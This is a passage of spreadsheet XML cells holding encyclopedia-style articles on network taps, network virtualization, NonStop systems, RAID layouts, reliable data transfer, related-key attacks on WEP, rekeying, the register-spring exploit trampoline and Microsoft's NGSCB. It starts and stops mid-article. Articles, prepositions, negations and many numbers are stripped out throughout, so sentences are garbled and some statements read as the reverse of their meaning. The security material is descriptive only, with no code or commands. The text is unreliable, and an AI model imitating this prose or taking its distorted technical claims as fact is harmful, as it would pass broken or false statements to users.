devices, means monitoring impact devices monitored. this scenario active, inline security tools, next-generation fire walls, intrusion prevention systems application firewalls. once place, monitoring device connected as-needed without impacting monitored network. some taps multiple output ports, multiple pairs output ports full-duplex, allow device monitor network point. these often called regeneration taps. some taps operate physical layer model rather data link layer. example, work multi-mode fiber rather 1000base-sx. this means work data link network technologies physical media, forms ethernet. network taps simple optical splitters, sometimes called passive taps (although term used consistently) property. some network taps offer duplication network traffic monitoring devices snmp services. most major network manufacturers offer taps remote management telnet, http, snmp interfaces. such network hybrids helpful network managers wish view baseline performance statistics without diverting existing tools. alternatively, snmp alarms generated managed taps alert network managers link conditions merit examination analyzers intrusion detection systems. some taps power (i.e., pass-through) power (i.e., pass-through monitor) network itself. these referred inline power. some taps also reproduce low-level network errors, short frames, corrupted data. advantages network here advantages network port mirroring span: passive; fail-safe zero configuration secure exact duplicate network traffic added latency altered timing passes network errors addition good frames/packets oversubscription issue disadvantages problems because network taps require additional hardware, cheap technologies capabilities built network. however, network taps easier manage normally provide data network devices. network taps require channel bonding monitoring devices around problem full-duplex discussed above. vendors usually refer aggregation well. putting network place disrupt network monitored short time. even short disruption preferable taking network multiple times deploy monitoring tool. establishing good guidelines placement network taps recommended. monitoring large networks using network taps require monitoring devices. high-end networking devices often allow ports enabled mirror ports, software network tap. while free port configured mirror port, software taps require configuration place load network devices. even fully passive network taps introduce points failure network. there several ways taps cause problems, considered creating architecture. consider non-powered taps optical-only environments throwing star network copper 100base-tx. this allows modify intelligent aggregation taps avoids complications upgrading megabit gigabit gigabit. redundant power supplies highly recommended. fully passive possible optical connections bandwidth copper connections type g703 (2mbit) ethernet base-t 10/100 mbit. gigabit gbit base-t connections, passive tapping currently possible. countermeasures countermeasures network taps include encryption alarm systems. encryption make stolen data unintelligible thief. however, encryption expensive solution, also concerns network bandwidth used. another counter-measure deploy fiber-optic sensor existing raceway, conduit armored cable. scenario, anyone attempting physically access data (copper fiber infrastructure) detected alarm system. small number alarm systems manufacturers provide simple monitor optical fiber physical intrusion disturbances. there also proven solution utilizes existing dark (unused) fiber multi-strand cable purpose creating alarm system. alarmed cable scenario, sensing mechanism uses optical interferometry modally dispersive coherent light traveling multi-mode fiber mixes fiber's terminus, resulting characteristic pattern light dark splotches called speckle. laser speckle stable long fiber remains immobile, flickers fiber vibrated. fiber-optic sensor works measuring time dependence speckle pattern applying digital signal processing fast fourier transform (fft) temporal data. u.s. government concerned tapping threat many years, also concern forms intentional accidental physical intrusion. context classified information department defense (dod) networks, protected distribution systems (pds) military instructions guidelines network physical protection. defined system carriers (raceways, conduits, ducts, etc.) used distribute military national security information (nsi) controlled areas controlled area area lesser classification (i.e., outside scif similar area). national security telecommunications information systems security instruction (nstissi) 7003, protective distribution systems (pds), provides guidance protection siprnet wire line optical fiber transmit unencrypted classified national security information (nsi). gigabit ethernet issues 1000base-t signal uses modulation, meaning cable pair transports bits simultaneously directions. chips cable complex task hand, must separate signals other. this possible know signal, deduct send signals mixed signals line interpret information sent link partners. copper link shown picture possible middle wire complex modulation signals. terminate signal shown picture) chip separate signal send signal link partner. this solution works causes problems. passive longer, case failure link services link interrupted. minimize problem copper bypass switch (relays), closes power situation shown picture), bring link back also solution detect link minimum three seconds. these three seconds result autonegotiation behavior. this changed vital function ieee 802.3 standard described clause even short interruption time could cause problems network. cases links cannot re-established without shutting services. rerouting functions network take place streaming applications collapse cause issues. some layer information transported copper (e.g. pause frames) clock synchronization affected. sync-e standard gbit copper impossible ieee 1588 affected, additional delay copper produces. also virtual device dshield shieldsup references external links make-a-passive-network-tap</t>
  </si>
  <si>
    <t>Network virtualization</t>
  </si>
  <si>
    <t>computing, network virtualization process combining hardware software network resources network functionality single, software-based administrative entity, virtual network. network virtualization involves platform virtualization, often combined resource virtualization. network virtualization categorized either external virtualization, combining many networks parts networks virtual unit, internal virtualization, providing network-like functionality software containers single network server. software testing, software developers network virtualization test software development simulation network environments software intended operate. component application performance engineering, network virtualization enables developers emulate connections applications, services, dependencies, users test environment without physically test software possible hardware system software. validity test depends accuracy network virtualization emulating real hardware operating systems. components various equipment software vendors offer network virtualization combining following: network hardware, switches network adapters, also known network interface cards (nics) network elements, firewalls load balancers networks, virtual lans (vlans) containers virtual machines (vms) network storage devices network machine-to-machine elements, telecommunications devices network mobile elements, laptop computers, tablet computers, smartphones network media, ethernet fibre channel external virtualization external network virtualization combines subdivides local area networks (lans) virtual networks improve large network's data center's efficiency. virtual local area network (vlan) network switch comprise components. using technology, system administrator configure systems physically attached local network separate virtual networks. conversely, administrator combine systems separate local area networks (lans) single vlan spanning segments large network. internal virtualization internal network virtualization configures single system software containers, hypervisor control programs, pseudo-interfaces, vnic, emulate physical network software. this improve single system's efficiency isolating applications separate containers pseudo-interfaces. examples citrix vyatta built virtual network protocol stack combining vyatta's routing, firewall, functions citrix's netscaler load balancer, branch repeater wide area network (wan) optimization, secure sockets layer vpn. opensolaris network virtualization provides so-called "network box" (see opensolaris network virtualization resource control). microsoft virtual server uses virtual machines make "network box" systems. these containers different operating systems, microsoft windows linux, either associated independent specific network interface controller (nic). "use testing" network virtualization used application development testing mimic real-world hardware system software. application performance engineering, network virtualization enables emulation connections applications, services, dependencies, users software testing. wireless network virtualization wireless network virtualization broad scope ranging spectrum sharing, infrastructure virtualization, interface virtualization. similar wired network virtualization, physical infrastructure owned providers shared among multiple service providers, wireless network virtualization needs physical wireless infrastructure radio resources abstracted isolated number virtual resources, offered different service providers. words, virtualization, regardless wired wireless networks, considered process splitting entire network system. however, distinctive properties wireless environment, terms time-various channels, attenuation, mobility, broadcast, etc., make problem complicated. furthermore, wireless network virtualization depends specific access technologies, wireless network contains much access technologies compared wired network virtualization access technology particular characteristics, makes convergence, sharing abstraction difficult achieve. therefore, inaccurate consider wireless network virtualization subset network virtualization. performance until gbit/s networks, network virtualization suffering overhead software layers hypervisor layers providing interconnects. with rise high bandwidth, gbit/s beyond, rates packets exceed capabilities processing networking stacks. order keep offering high throughput processing, combinations software hardware helpers deployed so-called "network box" associated either hardware-dependent network interface controller (nic) using sriov extensions hypervisor either using fast path technology payloads (virtual machines containers). example, case openstack, network provided neutron leverages many features linux kernel networking: iptables, iproute2, bridge, routing ovs. since linux kernel cannot sustain packet rate, bypass technologies fast path used. main bypass technologies either based limited features open vswitch (ovs) dpdk user space implementation based full feature offload linux processing 6wind virtual accelerator. also application performance engineering hardware virtualization virtualization network function virtualization network virtualization using generic routing encapsulation overlay network virtual circuit virtual extensible virtual firewall virtual private network references further reading esposito, flavio; matta, ibrahim; ishakian, vatche (2011). "slice embedding solutions distributed service architectures" (pdf). computing surveys. (1): 1–29. citeseerx 10.1.1.300.4425. doi:10.1145/2522968.2522974. retrieved december 2017. chowdhury, n.m. mosharaf kabir; boutaba, raouf (2010). survey network virtualization". computer networks. (5): 862–876. doi:10.1016/j.comnet.2009.10.017. issn 1389-1286. berl, andreas; fischer, andreas; meer, hermann (2009). "using system virtualization create virtualized networks". electronic communications easst. 1–12. issn 1863-2122. fischer, andreas; botero, juan felipe; beck, michael till; meer, hermann; hesselbach, xavier (2013). "virtual network embedding: survey". ieee communications surveys tutorials. (4): 1–19. doi:10.1109/surv.2013.013013.00155. issn 1553-877x. external links networkvirtualization.com news retrieved june 2008 vpls tutorial types vpns vmware virtual networking concepts retrieved october 2008 network functions virtualization(nfv) benefits</t>
  </si>
  <si>
    <t>NonStop SQL</t>
  </si>
  <si>
    <t>nonstop commercial relational database management system designed fault tolerance scalability, currently offered hewlett packard enterprise. latest version sql/mx 3.4. product originally developed tandem computers. tandem acquired compaq 1997. compaq later acquired hewlett packard 2002. when hewlett packard split 2015 inc. hewlett packard enterprise, nonstop rest nonstop product line went hewlett packard enterprise. product primarily used online transaction processing tailored organizations need high availability scalability database system. typical users product stock exchanges, telecommunications, pos, bank networks. history nonstop designed effectively parallel computers, adding functionality distributed data, distributed execution, distributed transactions. first released 1987, second version 1989 added ability queries parallel, product became fairly famous systems scales almost linearly number processors machine: adding second existing nonstop server almost exactly doubled performance. second version added name, massively parallel. third version, nonstop sql/mx, attempt tandem computers create product ansi compliant predecessor. nonstop sql/mx shipped nonstop platform since 2002, access tables created nonstop sql/mp, although "native sql/mx tables" offer ansi compliance many "oracle-like" enhancements. neoview business intelligence platform built using nonstop origins. nonstop sql/mx hp's oltp database product. parts neoview code base open-sourced 2014 name trafodion, top-level apache project. also list relational database management systems comparison relational database management systems references external links nonstop product website</t>
  </si>
  <si>
    <t>Relocatable user backup</t>
  </si>
  <si>
    <t>relocatable user backup (rub) ability restore relocate backups another system site. primary ways mitigate threat service-provider lock-in software service model. also provides backup event service-provider suffers catastrophic failure.the concept requires fundamental components user must able initiate receive backups service provider store locally user must able restore backup environment provided service provider, preferably locally backup must encapsulate content, metadata, system application state allow easy restoration backup standard framework either provided maintained service provider wider software community.the third component also contains implication either application provided backup, consistent ongoing application upgrade path prevent situation restore prevented obsolete version application software. references</t>
  </si>
  <si>
    <t>Non-RAID drive architectures</t>
  </si>
  <si>
    <t>widespread standard configuring multiple hard disk drives raid (redundant array inexpensive/independent disks), comes number standard configurations non-standard configurations. non-raid drive architectures also exist, referred acronyms tongue-in-cheek similarity raid: jbod (derived "just bunch disks"): described multiple hard disk drives operated individual independent hard disk drives. span big: method combining free space multiple hard disk drives "jbod" create spanned volume. such concatenation sometimes also called big/span. span generally spanned volume only, often contains mismatched types sizes hard disk drives. maid (derived "massive array idle drives"): architecture using hundreds thousands hard disk drives providing nearline storage data, primarily designed "write once, read occasionally" (woro) applications, increased storage density decreased cost traded increased latency decreased redundancy. jbod jbod (abbreviated "just bunch disks"/"just bunch drives") architecture using multiple hard drives exposed individual devices. hard drives treated independently combined logical volumes using volume manager like mdadm, device-spanning filesystem like btrfs; volumes usually called "spanned" "linear span big". spanned volume provides redundancy, failure single hard drive amounts failure whole logical volume. redundancy resilience and/or bandwidth improvement provided, software, higher level. concatenation (span, big) concatenation spanning drives numbered raid levels, popular method combining multiple physical disk drives single logical disk. provides data redundancy. drives merely concatenated together, beginning, appear single large disk. referred span (meaning words "span" "big", acronyms).in adjacent diagram, data concatenated disk (block a63) beginning disk (block a64); disk (block a91) beginning disk (block a92). raid used, disk disk would truncated blocks, size smallest disk array (disk total size blocks.what makes span different raid configurations possibility selection drives. while raid usually requires drives similar capacity preferred similar drive models used performance reasons, spanned volume requirements. implementations initial release microsoft's windows home server employs drive extender technology, whereby array independent drives combined form single pool available storage. this storage presented user single network shares. drive extender technology expands normal features concatenation providing data redundancy software shared folder marked duplication, signals copy data kept multiple physical drives, whilst user ever single instance data. this feature removed windows home server subsequent major release.the btrfs filesystem span multiple devices different sizes, including raid 0/1/10 configurations, storing redundant copies data metadata. flawed raid also exists, result data loss.) raid devices must complementary sizes. example, filesystem spanning devices device could provide raid1 data, filesystem spanning device single device could provide raid1 data. filesystem likewise pool multiple devices different sizes implement raid, though less flexible, requiring creation virtual devices fixed size device pooling.in enterprise environments, enclosures used expand server's data storage using jbod devices. this often convenient scale-up storage needed daisy-chaining additional disk shelves. maid maid (abbreviated "massive array idle drives") architecture using hundreds thousands hard drives providing nearline storage data. maid designed "write once, read occasionally" (woro) applications.compared raid technology, maid increased storage density, decreased cost, electrical power, cooling requirements. however, advantages cost much increased latency, significantly lower throughput, decreased redundancy. drives designed multiple spin-up/down cycles (e.g. laptop drives) significantly expensive. latency high tens seconds. maid supplement replace tape libraries hierarchical storage management.to allow gradual tradeoff access time power savings, maids nexsan's automaid incorporate drives capable spinning lower speed. large scale disk storage systems based maid architectures allow dense packaging drives designed disks spinning time. also nested raid levels non-standard raid levels standard raid levels file-based replication notes references external links pcguide "just bunch disks" (jbod)</t>
  </si>
  <si>
    <t>NonStop (server computers)</t>
  </si>
  <si>
    <t>nonstop series server computers introduced market 1976 tandem computers inc., beginning nonstop product line, followed hewlett-packard integrity nonstop product line extension. currently offered hewlett packard enterprise since hewlett-packard company's split 2015. because nonstop systems based integrated hardware/software stack, also developed nonstop operating system them. nonstop systems are, extent, self-healing. circumvent single points failure, equipped almost redundant components. when mainline component fails, system automatically falls back backup. these systems often used banks, stock exchanges, payment applications, retail companies, energy utility services, healthcare organizations, manufacturers, telecommunication providers, transportation enterprises requiring extremely high uptime. history originally introduced 1976 tandem computers inc., line later owned compaq (from 1997), hewlett-packard company (from 2003) hewlett packard enterprise (since 2015). 2005, current product line integrity "nonstop tns/e) servers, based intel itanium microprocessors, introduced. 2014, first systems "nonstop tns/x) running intel chip introduced. sales itanium-based systems ended july 2020.early nonstop applications specifically coded fault-tolerance. that requirement removed 1983 introduction transaction monitoring facility (tmf), handles various aspects fault tolerance system level. software nonstop message-based operating system designed fault tolerance. works process pairs ensures backup processes redundant cpus take case process failure. data integrity maintained takeovers; transactions data lost corrupted. operating system whole branded nonstop includes guardian layer, low-level component operating system so-called personality runs atop layer, implements unix-like interface components use. operating system application designed support fault tolerant hardware. operating system continually monitors status components, switching control necessary maintain operations. there also features designed software allow programs written continuously available programs. that accomplished using pair processes process performs primary processing serves "hot backup", receiving updates data whenever primary reaches critical point processing. should primary stop, backup steps resume execution using current transaction.the systems support relational database management systems like nonstop hierarchical databases enscribe. hardware integrity nonstop computers line fault-tolerant, message-based server computers based intel xeon processor platform, optimized transaction processing. average availability levels 99.999% observed. nonstop systems feature massively parallel processing (mpp) architecture provide linear scalability. each runs copy systems expanded 4000 cpus. this shared-nothing architecture "share nothing" arrangement also known loosely coupled multiprocessing, "diminishing returns" occur processors added (see amdahl's law). integrated hardware/software stack single system image even largest configurations, system management requirements nonstop systems rather low. deployments single production server, complex server farm. most customers also backup server remote location disaster recovery. there standard products keep data production backup server sync, example, hpe's remote database facility (rdf), hence fast takeover little data loss also disaster situation production server disabled destroyed. also developed data warehouse business intelligence server line, neoview, based nonstop line. acted database server, providing nonstop nonstop sql, lacked transaction processing functionality original nonstop systems. line retired, longer marketed, january 2011. also reliability engineering tandem advanced command language references sources siewiorek, daniel swarz, robert (1998). reliable computer systems, peters, ltd., isbn 1-56881-092-x. 586–625. horst, r.w. (february 1995). "tnet: reliable system area network". ieee micro. horst, robert harris, richard jardine, robert (1990). "multiple instruction issue nonstop cyclone processor". proceedings 17th annual international symposium computer architecture. 216–226. bernick, (2005). "nonstop advanced architecture". proceedings 2005 international conference dependable systems networks. kim, (march 1984). "highly available systems database applications". computing surveys. external links nonstop</t>
  </si>
  <si>
    <t>Reliable Data Transfer</t>
  </si>
  <si>
    <t>reliable data transfer technique algorithm computer networking. purpose transfer data reliable unreliable data channels. considered important topics networking version reliable data transfer with reliable data transfer 1.0, data transferred reliable data channel. simple reliable data transfer protocols terms algorithm processing. reliable data transfer reliable data transfer supports reliable data transfer unreliable data channels. uses checksum detect errors. receiver sends acknowledgement message message complete, message incomplete, sends negative acknowledgement message requests data again. reliable data transfer reliable data transfer also supports reliable data transfers unreliable data channels uses checksum detect errors. however, prevent duplicate messages, adds sequence number packet. receiver sends acknowledgement message corresponding sequence data complete, sends negative acknowledgement message corresponding sequence asks sender send message complete. reliable data transfer reliable data transfer 3.0, like earlier versions protocol, supports reliable data transfer unreliable data channels, uses checksums check errors, adds sequence numbers data packets. additionally, includes countdown timer detect packet loss. sender cannot acknowledge specific data certain duration, consider packet lost send again. references also reliable data protocol computer networking go-back-n selective repeat</t>
  </si>
  <si>
    <t>Reliability, availability and serviceability</t>
  </si>
  <si>
    <t>reliability, availability serviceability (ras), also known reliability, availability, maintainability (ram), computer hardware engineering term involving reliability engineering, high availability, serviceability design. phrase originally used international business machines (ibm) term describe robustness mainframe computers.computers designed higher levels many features protect data integrity help stay available long periods time without failure this data integrity uptime particular selling point mainframes fault-tolerant systems. definitions while originated hardware-oriented term, systems thinking extended concept reliability-availability-serviceability systems general, including software. reliability defined probability system produce correct outputs given time reliability enhanced features help avoid, detect repair hardware faults. reliable system silently continue deliver results include uncorrected corrupted data. instead, detects and, possible, corrects corruption, example: retrying operation transient (soft) intermittent errors, else, uncorrectable errors, isolating fault reporting higher-level recovery mechanisms (which failover redundant replacement hardware, etc.), else halting affected program entire system reporting corruption. reliability characterized terms mean time failures (mtbf), reliability exp(-t/mtbf). availability means probability system operational given time, i.e. amount time device actually operating percentage total time operating. high-availability systems report availability terms minutes hours downtime year. availability features allow system stay operational even faults occur. highly available system would disable malfunctioning portion continue operating reduced capacity. contrast, less capable system might crash become totally nonoperational. availability typically given percentage time system expected available, e.g., 99.999 percent ("five nines"). serviceability maintainability simplicity speed system repaired maintained; time repair failed system increases, availability decrease. serviceability includes various methods easily diagnosing system problems arise. early detection faults decrease avoid system downtime. example, enterprise systems automatically call service center (without human intervention) system experiences system fault. traditional focus making correct repairs little disruption normal operations possible.note distinction reliability availability: reliability measures ability system function correctly, including avoiding data corruption, whereas availability measures often system available use, even though functioning correctly. example, server forever ideal availability, unreliable, frequent data corruption. failure types physical faults temporary permanent. permanent faults lead continuing error typically physical failure metal electromigration dielectric breakdown. temporary faults include transient intermittent faults. transient (a.k.a. soft) faults lead independent one-time errors permanent hardware faults: examples include alpha particles flipping memory bit, electromagnetic noise, power-supply fluctuations. intermittent faults occur weak system component, e.g. circuit parameters degrading, leading errors likely recur. failure responses transient intermittent faults typically handled detection correction e.g., codes instruction replay (see below). permanent faults lead uncorrectable errors handled replacement duplicate hardware, e.g., processor sparing, passing uncorrectable error high level recovery mechanisms. successfully corrected intermittent fault also reported operating system (os) provide information predictive failure analysis. hardware features example hardware features improving include following, listed subsystem: processor: processor instruction error detection (e.g. residue checking results) instruction retry e.g. alternative processor recovery mainframes, "instruction replay technology" itanium systems. processors running lock-step perform master-checker voting schemes. machine check architecture acpi platform error interface report errors memory: parity (including single device correction) protection memory components (cache main memory); cache line disabling; memory scrubbing; memory sparing, memory mirroring; page offlining; redundant steering; redundant array independent memory (raim). i/o: cyclic redundancy check checksums data transmission/retry data storage, e.g. express (pcie) advanced error reporting (aer), redundant paths. storage: raid configurations hard disk drive solid state drive storage. journaling file systems file repair crashes. checksums data metadata, background scrubbing. s.m.a.r.t. technology hard disk drive solid state drive. power/cooling: duplicating components avoid single points failure, e.g., power-supplies. over-designing system specified operating ranges clock frequency, temperature, voltage, vibration. temperature sensors throttle operating frequency temperature goes specification. surge protector, uninterruptible power supply, auxiliary power. system: swapping components: cpus, rams, hard disk drives solid state drives. predictive failure analysis predict intermittent correctable errors lead eventually hard non-correctable errors. partitioning/domaining computer components allow large system several smaller systems. virtual machines decrease severity operating system software faults. redundant domains partitions providing virtual guest virtual machines. computer clustering capability failover capability, complete redundancy hardware software. dynamic software updating avoid need reboot system kernel software update, example ksplice linux. independent management processor serviceability: remote monitoring, alerting control.fault-tolerant designs extended idea making defining feature computers applications like stock market exchanges traffic control, system crashes would catastrophic. fault-tolerant computers (e.g., tandem computers stratus technologies), tend duplicate components running lock-step reliability, become less popular, high cost. high availability systems, using distributed computing techniques like computer clusters, often used cheaper alternatives. also machine check architecture redundancy (engineering) integrated logistics support rams references external links itanium reliability, availability serviceability (ras) features overview features general specific features itanium processor. power7 system aspects power systems reliability, availability, serviceability. daniel henderson, mitchell, george ahrens. february 2012 overview features power processors. intel corp. reliability, availability, serviceability always-on enterprise (appendix intel xeon processor family: supporting next generation servers. white paper. overview features xeon processors. zenterprise system overview. corp. (chapter overview features z196 processor zenterprise server. maximizing application reliability availability sparc m5-32 server features oracle’s sparc m5-32 server</t>
  </si>
  <si>
    <t>Non-standard RAID levels</t>
  </si>
  <si>
    <t>although raid implementations differ specification extent, companies open-source projects developed non-standard raid implementations differ substantially standard. additionally, non-raid drive architectures, providing configurations multiple hard drives referred raid acronyms. double parity part raid double parity (sometimes known diagonal parity) features sets parity checks, like traditional raid differently, second another points over-defined polynomial characterizes data. rather, double parity calculates extra parity different group blocks. example, graph raid consider a-labeled blocks produce parity blocks. however, fairly easy calculate parity multiple groups blocks, calculate blocks permuted group blocks. raid-dp raid-dp proprietary netapp raid implementation available ontap systems. raid implements raid except additional disk used second parity, failure characteristics raid performance penalty raid-dp typically compared similar raid configuration. raid raid 5ee, raid raid raid 5ee, raid (with added standing enhanced) generally refer variants raid integrated hot-spare drive, spare drive active part block rotation scheme. this spreads across drives, including spare, thus reducing load drive, increasing performance. does, however, prevent sharing spare drive among multiple arrays, occasionally desirable. intel matrix raid intel matrix raid feature intel rapid storage technology) feature (not raid level) present ich6r subsequent southbridge chipsets intel, accessible configurable raid bios setup utility. matrix raid supports physical disks many controller supports. distinguishing feature matrix raid allows assortment raid volumes array, controllable (and identical) portion disk allocated.as such, matrix raid array improve performance data integrity. practical instance would small raid (stripe) volume operating system, program, paging files; second larger raid (mirror) volume would store critical data. linux raid also capable this. linux raid software raid subsystem provided linux kernel, called supports creation classic (nested) raid arrays, non-standard raid arrays single-level raid layout additional features.the standard "near" layout, chunk repeated times k-way stripe array, equivalent standard raid arrangement, require evenly divides example, layout two, three, four drives would look like: drives drives drives -------- ---------- -------------- four-drive example identical standard raid array, three-drive example software implementation raid two-drive example equivalent raid 1.the driver also supports "far" layout, drives divided sections. chunks repeated section switched groups (for example, pairs). example, layouts two-, three-, four-drive arrays would look like this: drives drives drives -------- ------------ ------------------ "far" layout designed offering striping performance mirrored array; sequential reads striped, raid configurations. random reads somewhat faster, sequential random writes offer equal speed mirrored raid configurations. "far" layout performs well systems reads frequent writes, common case. comparison, regular raid provided linux software raid, stripe reads, perform reads parallel.the driver also supports "offset" layout, stripe repeated times offset (far) devices. example, layouts two-, three-, four-drive arrays laid drives drives drives -------- ---------- --------------- also possible combine "near" "offset" layouts (but "far" "offset").in examples above, number drives, given parameters mdadm's --layout option. linux software raid (linux kernel's driver) also supports creation standard raid configurations. raid some raid implementations treat arrays disks differently, creating non-standard raid level known raid layout, data striping combined mirroring, mirroring written stripe remaining disks array. usable capacity raid array total capacity drives forming array; drives different sizes used, portions equal size smallest member utilized drive.one benefits raid usual raid mirrored pairs performance random read operations remains performance single drive even degraded array. raid-z filesystem provides raid-z, data/parity distribution scheme similar raid using dynamic stripe width: every block raid stripe, regardless blocksize, resulting every raid-z write full-stripe write. this, combined copy-on-write transactional semantics zfs, eliminates write hole error. raid-z also faster traditional raid need perform usual read-modify-write sequence. raid-z require special hardware, nvram reliability, write buffering performance.given dynamic nature raid-z's stripe width, raid-z reconstruction must traverse filesystem metadata determine actual raid-z geometry. this would impossible filesystem raid array separate products, whereas becomes feasible integrated view logical physical structure data. going metadata means validate every block 256-bit checksum goes, whereas traditional raid products usually cannot this.in addition handling whole-disk failures, raid-z also detect correct silent data corruption, offering "self-healing data": reading raid-z block, compares checksum, data disks return right answer, reads parity figures disk returned data. then, repairs damaged data returns good data requestor.there five different raid-z modes: raid-z0 (similar raid offers redundancy), raid-z1 (similar raid allows disk fail), raid-z2 (similar raid allows disks fail), raid-z3 raid configuration, allows three disks fail), mirror (similar raid allows disks fail). drive extender windows home server drive extender specialized case jbod raid implemented file system level.microsoft announced 2011 drive extender would longer included part windows home server version windows home server 2011 (codename vail). result, third-party vendor move fill void left included competitors division developers drive bender, stablebit's drivepool. beyondraid beyondraid true raid extension, consolidates sata hard drives pool storage. advantage supporting multiple disk sizes once, much like jbod, providing redundancy disks allowing hot-swap upgrade time. internally uses techniques similar raid depending fraction data relation capacity, survive three drive failures, "array" restored onto remaining good disks another drive fails. amount usable storage approximated summing capacities disks subtracting capacity largest disk. example, 500, 400, 200, drive installed, approximate usable capacity would usable space. internally data would distributed raid 5–like arrays raid 1-like sets: drives ---------- unusable space (100 ---------- ---------- ---------- raid ---------- ---------- ---------- ---------- raid ---------- ---------- ---------- ---------- ---------- raid array ---------- ---------- ---------- ---------- ---------- ---------- ---------- raid array ---------- ---------- ---------- ---------- beyondraid offers raid 6–like feature perform hash-based compression using 160-bit sha-1 hashes maximize storage efficiency. unraid unraid proprietary linux-based operating system optimized media file storage. unfortunately unraid provide information storage technology, parity array rewrite mdadm module. disadvantages include closed-source code, high price, slower write performance single disk bottlenecks multiple drives written concurrently. however, unraid allows support cache pool dramatically speed write performance. cache pool data temporarily protected using btrfs raid unraid moves array based schedule within software.advantages include lower power consumption standard raid levels, ability multiple hard drives differing sizes full capacity event multiple concurrent hard drive failures (exceeding redundancy), losing data stored failed hard drives compared standard raid levels offer striping case data array lost hard drives fail redundancy handle. crypto softraid openbsd, crypto encrypting discipline softraid subsystem. encrypts data single chunk provide data confidentiality. crypto provide redundancy. profile some filesystems, btrfs, zfs/openzfs (with per-dataset copies=1|2|3 property), support creating multiple copies data single drive disks pool, protecting individual sectors, large numbers sectors complete drive failure. this allows benefits raid computers accept single drive, laptops. declustered raid declustered raid allows arbitrarily sized disk arrays reducing overhead clients recovering disk failures. uniformly spreads declusters user data, redundancy information, spare space across disks declustered array. under traditional raid, entire disk storage system say, disks would split multiple arrays say, disks. contrast, declustered raid, entire storage system used make array. every data item written twice, mirroring, logically adjacent data copies spread arbitrarily. when disk fails, erased data rebuilt using operational disks array, bandwidth greater fewer disks conventional raid group. furthermore, additional disk fault occurs rebuild, number impacted tracks requiring repair markedly less previous failure less constant rebuild overhead conventional array. decrease declustered rebuild impact client overhead factor three four times less conventional raid. file system performance becomes less dependent upon speed single rebuilding storage array. also nested raid levels standard raid levels explanatory notes references build server using enterprise parts</t>
  </si>
  <si>
    <t>Related-key attack</t>
  </si>
  <si>
    <t>cryptography, related-key attack form cryptanalysis attacker observe operation cipher several different keys whose values initially unknown, mathematical relationship connecting keys known attacker. example, attacker might know last bits keys always same, even though know, first, bits are. this appears, first glance, unrealistic model; would certainly unlikely attacker could persuade human cryptographer encrypt plaintexts numerous secret keys related way. kasumi kasumi eight round, 64-bit block cipher 128-bit key. based upon misty1, designed form basis confidentiality integrity algorithms. mark blunden adrian escott described differential related attacks five rounds kasumi. differential attacks introduced biham shamir. related attacks first introduced biham. differential related attacks discussed kelsey important example cryptographic protocol failed related-key attack wired equivalent privacy (wep) used wi-fi wireless networks. each client wi-fi network adapter wireless access point wep-protected network shares key. encryption uses algorithm, stream cipher. essential never used twice stream cipher. prevent happening, includes 24-bit initialization vector (iv) message packet. packet concatenated key. keys changed manually typically happens infrequently. attacker therefore assume keys used encrypt packets share single key. this fact opened series attacks proved devastating. simplest understand uses fact 24-bit allows little million possibilities. because birthday paradox, likely every 4096 packets, share hence key, allowing packets attacked. more devastating attacks take advantage certain weak keys eventually allow recovered. 2005, agents u.s. federal bureau investigation publicly demonstrated ability widely available software tools three minutes. preventing related-key attacks approach preventing related-key attacks design protocols applications encryption keys never simple relationship other. example, encryption generated underlying material using derivation function. example, replacement wep, wi-fi protected access (wpa), uses three levels keys: master key, working key. master shared client access point used protocol called temporal integrity protocol (tkip) create working keys frequently enough thwart known attack methods. working keys combined longer, 48-bit form packet. this design mimics approach enough allow used first-generation wi-fi network cards, implemented portions hardware. however, first-generation access points wpa. another, conservative approach employ cipher designed prevent related-key attacks altogether, usually incorporating strong schedule. newer version wi-fi protected access, wpa2, uses block cipher instead rc4, part reason. there related-key attacks aes, unlike rc4, they're practical implement, wpa2's generation functions provide security them. many older network cards cannot wpa2. references</t>
  </si>
  <si>
    <t>Rekeying (cryptography)</t>
  </si>
  <si>
    <t>cryptography, rekeying refers process changing session key—the encryption ongoing communication—in order limit amount data encrypted key. roughly equivalent classical procedure changing codes daily basis, changed pre-set volume data transmitted given period time passed. contemporary systems, rekeying implemented forcing exchange, typically separate protocol like internet exchange (ike). procedure handled transparently user.a prominent application wi-fi protected access (wpa), extended security protocol wireless networks addresses shortcomings predecessor, wep, frequently replacing session keys temporal integrity protocol (tkip), thus defeating well-known recovery attacks. public infrastructure, rekeying "re-keying") leads issuance certificate contrast certificate renewal issuance certificate key, usually allowed cas). also diffie–hellman exchange elliptic-curve diffie-hellman ipsec internet exchange (ike) over rekeying (otar) references external links openssh: keyregenerationinterval parameter, command</t>
  </si>
  <si>
    <t>Register spring</t>
  </si>
  <si>
    <t>computer security, register spring sort trampoline. bogus return pointer structured exception handling (seh) pointer exploit places call stack, directing control flow existing code (within dynamic-link library (dll) static program binary). this target code turn consists call jump "call ebx" "jmp esp", appropriate processor register previously prepared exploit point payload code begins. sources crandall, jedidiah felix; chong, frederic (2005). "experiences using minos tool capturing analyzing novel worms unknown vulnerabilities". julisch, klaus; krügel, christopher (eds.). proceedings second international conference detection intrusions malware, vulnerability assessment (dimva 2005), vienna, austria, july 7-8, 2005 (pdf). lecture notes computer science (lncs). vol. 3548. springer. 32–50. isbn 3-540-26613-5. retrieved 2012-04-19.</t>
  </si>
  <si>
    <t>Next-Generation Secure Computing Base</t>
  </si>
  <si>
    <t>next-generation secure computing base (ngscb; codenamed palladium also known trusted windows') software architecture designed microsoft aimed provide users windows operating system better privacy, security, system integrity. ngscb result years research development within microsoft create secure computing solution equaled security closed platforms set-top boxes simultaneously preserving backward compatibility, flexibility, openness windows operating system. microsoft's primary stated objective ngscb "protect software software."part trustworthy computing initiative unveiled 2002, ngscb integrated windows vista, known "longhorn." ngscb relied hardware designed trusted computing group produce parallel operation environment hosted hypervisor (referred sort kernel documentation) called "nexus" existed alongside windows provided applications features hardware-based process isolation, data encryption based integrity measurements, authentication local remote machine software configuration, encrypted paths user authentication graphics output. ngscb would facilitate creation distribution digital rights management (drm) policies pertaining information.ngscb subject much controversy development, critics contending would impose restrictions users, enforce vendor lock-in, undermine fair rights open-source software. first demonstrated microsoft winhec 2003 undergoing revision 2004 would enable earlier applications benefit functionality. reports indicated 2005 microsoft would change plans ngscb could ship windows vista self-imposed deadline year, 2006; instead, microsoft would ship part architecture, bitlocker, optionally trusted platform module validate integrity boot system files prior operating system startup. development ngscb spanned approximately decade cancellation, lengthiest development period major feature intended windows vista. ngscb differed technologies microsoft billed "pillars windows vista"—windows presentation foundation, windows communication foundation, winfs—during development built .net framework focus managed code software development. ngscb fully materialize; however, 